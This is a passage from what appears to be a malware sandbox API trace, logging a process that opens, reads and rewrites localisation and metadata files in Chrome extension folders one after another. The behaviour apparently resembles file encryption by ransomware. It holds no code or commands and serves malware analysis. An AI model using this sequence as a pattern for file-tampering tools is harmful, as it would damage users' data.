lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0162.394] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x8fe, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x359f2d0*=0x8fe, lpOverlapped=0x0) returned 1 [0162.394] CloseHandle (hObject=0x1d8) returned 1 [0162.394] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0162.395] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0162.396] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2b8 [0162.396] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0162.396] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.396] ReleaseMutex (hMutex=0x168) returned 1 [0162.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0162.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0162.396] ReadFile (in: hFile=0x1d8, lpBuffer=0x2850988, nNumberOfBytesToRead=0x2b8, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2850988*, lpNumberOfBytesRead=0x359f2bc*=0x2b8, lpOverlapped=0x0) returned 1 [0162.420] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0162.420] WriteFile (in: hFile=0x1d8, lpBuffer=0x27e0038*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x27e0038*, lpNumberOfBytesWritten=0x359f2d0*=0x840, lpOverlapped=0x0) returned 1 [0162.420] CloseHandle (hObject=0x1d8) returned 1 [0162.421] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0162.422] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0162.422] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2c6 [0162.422] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0162.422] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.422] ReleaseMutex (hMutex=0x168) returned 1 [0162.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0162.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0162.423] ReadFile (in: hFile=0x1d8, lpBuffer=0x2850988, nNumberOfBytesToRead=0x2c6, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2850988*, lpNumberOfBytesRead=0x359f2bc*=0x2c6, lpOverlapped=0x0) returned 1 [0162.435] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0162.436] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a5b98*, nNumberOfBytesToWrite=0x84e, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a5b98*, lpNumberOfBytesWritten=0x359f2d0*=0x84e, lpOverlapped=0x0) returned 1 [0162.436] CloseHandle (hObject=0x1d8) returned 1 [0162.436] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0162.437] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0162.437] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x282 [0162.437] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0162.437] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.438] ReleaseMutex (hMutex=0x168) returned 1 [0162.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0162.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0162.438] ReadFile (in: hFile=0x1d8, lpBuffer=0x286dd48, nNumberOfBytesToRead=0x282, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286dd48*, lpNumberOfBytesRead=0x359f2bc*=0x282, lpOverlapped=0x0) returned 1 [0162.447] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0162.447] WriteFile (in: hFile=0x1d8, lpBuffer=0x2807998*, nNumberOfBytesToWrite=0x80a, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2807998*, lpNumberOfBytesWritten=0x359f2d0*=0x80a, lpOverlapped=0x0) returned 1 [0162.448] CloseHandle (hObject=0x1d8) returned 1 [0162.448] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0162.449] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0162.449] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x32c [0162.450] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0162.450] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.450] ReleaseMutex (hMutex=0x168) returned 1 [0162.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0162.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ec, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0162.450] ReadFile (in: hFile=0x1d8, lpBuffer=0x25abb98, nNumberOfBytesToRead=0x32c, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25abb98*, lpNumberOfBytesRead=0x359f2bc*=0x32c, lpOverlapped=0x0) returned 1 [0162.460] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0162.461] WriteFile (in: hFile=0x1d8, lpBuffer=0x3d17b78*, nNumberOfBytesToWrite=0x8b4, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x3d17b78*, lpNumberOfBytesWritten=0x359f2d0*=0x8b4, lpOverlapped=0x0) returned 1 [0162.461] CloseHandle (hObject=0x1d8) returned 1 [0162.461] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0162.462] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0162.462] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2dfa [0162.462] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0162.463] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.463] ReleaseMutex (hMutex=0x168) returned 1 [0162.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="verified_contents.json", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0162.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="verified_contents.json", cchWideChar=22, lpMultiByteStr=0x1f88bcc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="verified_contents.json", lpUsedDefaultChar=0x0) returned 22 [0162.463] ReadFile (in: hFile=0x1d8, lpBuffer=0x2664868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2664868*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0162.470] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1dfa [0162.471] ReadFile (in: hFile=0x1d8, lpBuffer=0x2664868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2664868*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0162.479] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1dfa [0162.480] WriteFile (in: hFile=0x1d8, lpBuffer=0x2666898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2666898*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0162.480] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0162.480] WriteFile (in: hFile=0x1d8, lpBuffer=0x25adba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25adba8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0162.481] CloseHandle (hObject=0x1d8) returned 1 [0162.481] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0162.493] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0162.493] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xef [0162.493] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0162.493] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.493] ReleaseMutex (hMutex=0x168) returned 1 [0162.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0162.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ec, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0162.494] ReadFile (in: hFile=0x1d8, lpBuffer=0x2697608, nNumberOfBytesToRead=0xef, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2697608*, lpNumberOfBytesRead=0x359f2bc*=0xef, lpOverlapped=0x0) returned 1 [0162.495] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0162.495] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x677, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x359f2d0*=0x677, lpOverlapped=0x0) returned 1 [0162.495] CloseHandle (hObject=0x1d8) returned 1 [0162.496] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0162.496] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0162.497] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xe6 [0162.497] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0162.497] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.497] ReleaseMutex (hMutex=0x168) returned 1 [0162.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0162.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0162.497] ReadFile (in: hFile=0x1d8, lpBuffer=0x2697608, nNumberOfBytesToRead=0xe6, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2697608*, lpNumberOfBytesRead=0x359f2bc*=0xe6, lpOverlapped=0x0) returned 1 [0162.498] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0162.498] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x66e, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x359f2d0*=0x66e, lpOverlapped=0x0) returned 1 [0162.498] CloseHandle (hObject=0x1d8) returned 1 [0162.499] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0162.499] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0162.499] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xe8 [0162.500] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0162.500] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.500] ReleaseMutex (hMutex=0x168) returned 1 [0162.500] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0162.500] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ec, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0162.500] ReadFile (in: hFile=0x1d8, lpBuffer=0x2697608, nNumberOfBytesToRead=0xe8, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2697608*, lpNumberOfBytesRead=0x359f2bc*=0xe8, lpOverlapped=0x0) returned 1 [0162.501] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0162.501] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x359f2d0*=0x670, lpOverlapped=0x0) returned 1 [0162.501] CloseHandle (hObject=0x1d8) returned 1 [0162.501] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0162.502] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0162.502] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xde [0162.502] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0162.502] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.502] ReleaseMutex (hMutex=0x168) returned 1 [0162.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0162.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0162.502] ReadFile (in: hFile=0x1d8, lpBuffer=0x26c4e68, nNumberOfBytesToRead=0xde, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4e68*, lpNumberOfBytesRead=0x359f2bc*=0xde, lpOverlapped=0x0) returned 1 [0163.075] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0163.075] WriteFile (in: hFile=0x1d8, lpBuffer=0x3cfe118*, nNumberOfBytesToWrite=0x666, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x3cfe118*, lpNumberOfBytesWritten=0x359f2d0*=0x666, lpOverlapped=0x0) returned 1 [0164.849] CloseHandle (hObject=0x1d8) returned 1 [0164.854] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0164.875] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0164.875] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xf9 [0164.875] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0164.875] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.875] ReleaseMutex (hMutex=0x168) returned 1 [0164.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 